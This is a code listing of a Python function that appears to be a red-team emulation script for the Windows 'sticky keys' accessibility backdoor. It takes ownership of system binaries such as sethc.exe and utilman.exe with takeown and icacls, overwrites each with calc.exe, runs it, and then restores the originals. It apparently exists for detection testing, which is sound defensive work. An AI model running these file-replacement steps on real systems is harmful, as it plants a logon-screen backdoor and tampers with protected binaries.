def main()

in cortado/rtas/sticky_keys_write_execute.py [0:0]

• 25 lines of code
• 3 McCabe index (conditional complexity)

def main():
    # Prep
    bins = [
        "sethc.exe",
        "utilman.exe",
        "narrator.exe",
        "magnify.exe",
        "osk.exe",
        "displayswitch.exe",
        "atbroker.exe",
    ]
    calc = Path("\\windows\\system32\\calc.exe").resolve()
    temp = Path("temp.exe").resolve()

    # loop over bins
    for bin_name in bins:
        bin_path = Path("\\Windows\\system32\\" + bin_name).resolve()

        # Back up bin
        _common.copy_file(bin_path, temp)

        # Change Permissions to allow modification
        _ = _common.execute_command(["takeown", "/F", bin_path, "/A"])
        _ = _common.execute_command(["icacls", bin_path, "/grant", "Administrators:F"])

        # Copy Calc to overwrite binary, then run it
        _common.copy_file(calc, bin_path)
        _ = _common.execute_command(str(bin_path), shell=True, timeout_secs=1)

        # Restore Original File and Permissions on file
        _common.copy_file(temp, bin_path)
        _ = _common.execute_command(["icacls", bin_path, "/setowner", "NT SERVICE\\TrustedInstaller"])
        _ = _common.execute_command(["icacls", bin_path, "/grant:r", "Administrators:RX"])
        _common.remove_file(temp)

    # Cleanup
    time.sleep(2)
    _ = _common.execute_command(["taskkill", "/F", "/im", "calculator.exe"])